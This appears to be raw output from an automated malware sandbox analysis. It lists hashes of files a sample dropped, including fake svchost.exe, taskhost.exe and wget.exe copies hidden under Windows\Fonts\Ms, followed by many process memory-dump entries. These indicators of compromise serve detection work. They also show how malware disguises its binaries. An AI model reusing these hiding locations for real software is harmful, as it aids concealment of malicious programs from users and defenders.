3f16cd0ddc89cee34e2a17516d3cdaf7
SHA195980b35711abe98275faa6ecd6ca40f4ca41ead
SHA256309b9f57044afd1c8b0e0381da3e54cdd3f45aafd924bfbff2fd1d5aa0166e48
SHA51245b4e193b77f818c2f418e2b4dafb86c107dc6f9ec9f07eca9b44c7370bd234dbc3547cc8ea1f022d0b46f3dcf6b155836c8a60fbf342fbfbd423cda9a404f6b
-
C:\Windows\svchost.exeMD5
3f16cd0ddc89cee34e2a17516d3cdaf7
SHA195980b35711abe98275faa6ecd6ca40f4ca41ead
SHA256309b9f57044afd1c8b0e0381da3e54cdd3f45aafd924bfbff2fd1d5aa0166e48
SHA51245b4e193b77f818c2f418e2b4dafb86c107dc6f9ec9f07eca9b44c7370bd234dbc3547cc8ea1f022d0b46f3dcf6b155836c8a60fbf342fbfbd423cda9a404f6b
-
\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
\Windows\Fonts\Ms\svchost.exeMD5
7afcf45907f225e3e3cfeece3bbcd410
SHA19747e4c11bcf0393e1d1a2ac4b7c43af590da0bc
SHA256c5a346bd16c246db669605c70a547204313c0fa2325332a3d8427a4449e5b40e
SHA512ce091728b83bc4edb57dfbbeec4ce0de0220de82965ae3b2d6f71ce822be60a81c28ef7c605a8411c1113ee23513e06670029ec3b7af09ab0682b0358064c44f
-
\Windows\Fonts\Ms\taskhost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\Fonts\Ms\taskhost.exeMD5
c097fd043d3cbabcada0878505c7afa5
SHA1966a60028a3a24268c049ffadbe1a07b83de24ce
SHA2561328bd220d9b4baa8a92b8d3f42f0d123762972d1dfc4b1fd4b4728d67b01dfc
SHA5120837c537af0c75d5ce06d3ae6e0c6eefe3901535c908843d3771cd468657bca2e3c103b8a84c7c43f2cf1410782a595151fffc3c78fdc0f81277ed4894397fb0
-
\Windows\Fonts\Ms\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
\Windows\Fonts\Ms\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
\Windows\Help\dxdiag.exeMD5
3f16cd0ddc89cee34e2a17516d3cdaf7
SHA195980b35711abe98275faa6ecd6ca40f4ca41ead
SHA256309b9f57044afd1c8b0e0381da3e54cdd3f45aafd924bfbff2fd1d5aa0166e48
SHA51245b4e193b77f818c2f418e2b4dafb86c107dc6f9ec9f07eca9b44c7370bd234dbc3547cc8ea1f022d0b46f3dcf6b155836c8a60fbf342fbfbd423cda9a404f6b
-
\Windows\Help\dxdiag.exeMD5
3f16cd0ddc89cee34e2a17516d3cdaf7
SHA195980b35711abe98275faa6ecd6ca40f4ca41ead
SHA256309b9f57044afd1c8b0e0381da3e54cdd3f45aafd924bfbff2fd1d5aa0166e48
SHA51245b4e193b77f818c2f418e2b4dafb86c107dc6f9ec9f07eca9b44c7370bd234dbc3547cc8ea1f022d0b46f3dcf6b155836c8a60fbf342fbfbd423cda9a404f6b
-
memory/300-118-0x0000000000000000-mapping.dmp
-
memory/300-127-0x0000000000000000-mapping.dmp
-
memory/300-98-0x0000000000000000-mapping.dmp
-
memory/384-97-0x0000000000000000-mapping.dmp
-
memory/464-90-0x0000000000000000-mapping.dmp
-
memory/512-135-0x0000000000000000-mapping.dmp
-
memory/524-134-0x0000000000000000-mapping.dmp
-
memory/568-115-0x0000000000000000-mapping.dmp
-
memory/568-125-0x0000000000000000-mapping.dmp
-
memory/604-133-0x0000000000000000-mapping.dmp
-
memory/640-126-0x0000000000000000-mapping.dmp
-
memory/736-123-0x0000000000000000-mapping.dmp
-
memory/816-96-0x0000000000000000-mapping.dmp
-
memory/848-129-0x0000000000000000-mapping.dmp
-
memory/848-148-0x0000000000000000-mapping.dmp
-
memory/856-95-0x0000000000000000-mapping.dmp
-
memory/904-100-0x0000000000000000-mapping.dmp
-
memory/1000-117-0x0000000000000000-mapping.dmp
-
memory/1000-145-0x0000000000000000-mapping.dmp
-
memory/1020-112-0x0000000000000000-mapping.dmp
-
memory/1020-91-0x0000000000000000-mapping.dmp
-
memory/1028-92-0x0000000000000000-mapping.dmp
-
memory/1068-146-0x0000000000000000-mapping.dmp
-
memory/1104-139-0x0000000000000000-mapping.dmp
-
memory/1144-144-0x0000000000000000-mapping.dmp
-
memory/1156-93-0x0000000000000000-mapping.dmp
-
memory/1168-64-0x0000000000000000-mapping.dmp
-
memory/1200-147-0x0000000000000000-mapping.dmp
-
memory/1200-128-0x0000000000000000-mapping.dmp
-
memory/1276-99-0x0000000000000000-mapping.dmp
-
memory/1280-142-0x0000000000000000-mapping.dmp
-
memory/1292-141-0x0000000000000000-mapping.dmp
-
memory/1308-73-0x0000000000000000-mapping.dmp
-
memory/1328-124-0x0000000000000000-mapping.dmp
-
memory/1328-68-0x0000000000000000-mapping.dmp
-
memory/1380-119-0x0000000000000000-mapping.dmp
-
memory/1436-108-0x0000000000000000-mapping.dmp
-
memory/1436-132-0x0000000000000000-mapping.dmp
-
memory/1448-130-0x0000000000000000-mapping.dmp
-
memory/1448-84-0x0000000000000000-mapping.dmp
-
memory/1468-137-0x0000000000000000-mapping.dmp
-
memory/1468-94-0x0000000000000000-mapping.dmp
-
memory/1492-109-0x0000000000000000-mapping.dmp
-
memory/1556-143-0x0000000000000000-mapping.dmp
-
memory/1616-120-0x0000000000000000-mapping.dmp
-
memory/1636-138-0x0000000000000000-mapping.dmp
-
memory/1668-107-0x0000000000000000-mapping.dmp
-
memory/1676-122-0x0000000000000000-mapping.dmp
-
memory/1676-136-0x0000000000000000-mapping.dmp
-
memory/1692-150-0x0000000000000000-mapping.dmp
-
memory/1692-105-0x0000000000000000-mapping.dmp
-
memory/1704-151-0x0000000000000000-mapping.dmp
-
memory/1704-121-0x0000000000000000-mapping.dmp
-
memory/1776-149-0x0000000000000000-mapping.dmp
-
memory/1820-71-0x0000000000400000-0x0000000000863000-memory.dmpFilesize
4.4MB
-
memory/1820-59-0x0000000076641000-0x0000000076643000-memory.dmpFilesize
8KB
-
memory/1844-80-0x0000000000000000-mapping.dmp
-
memory/1872-116-0x0000000000000000-mapping.dmp
-
memory/1940-101-0x0000000000000000-mapping.dmp
-
memory/1952-106-0x0000000000000000-mapping.dmp
-
memory/1976-104-0x0000000000000000-mapping.dmp
-
memory/1976-140-0x0000000000000000-mapping.dmp
-
memory/2028-103-0x0000000000000000-mapping.dmp
-
memory/2032-102-0x0000000000000000-mapping.dmp
-
memory/2032-131-0x0000000000000000-mapping.dmp
-
memory/2040-74-0x0000000010000000-0x000000001000B000-memory.dmpFilesize
44KB
-
memory/2040-62-0x0000000000000000-mapping.dmp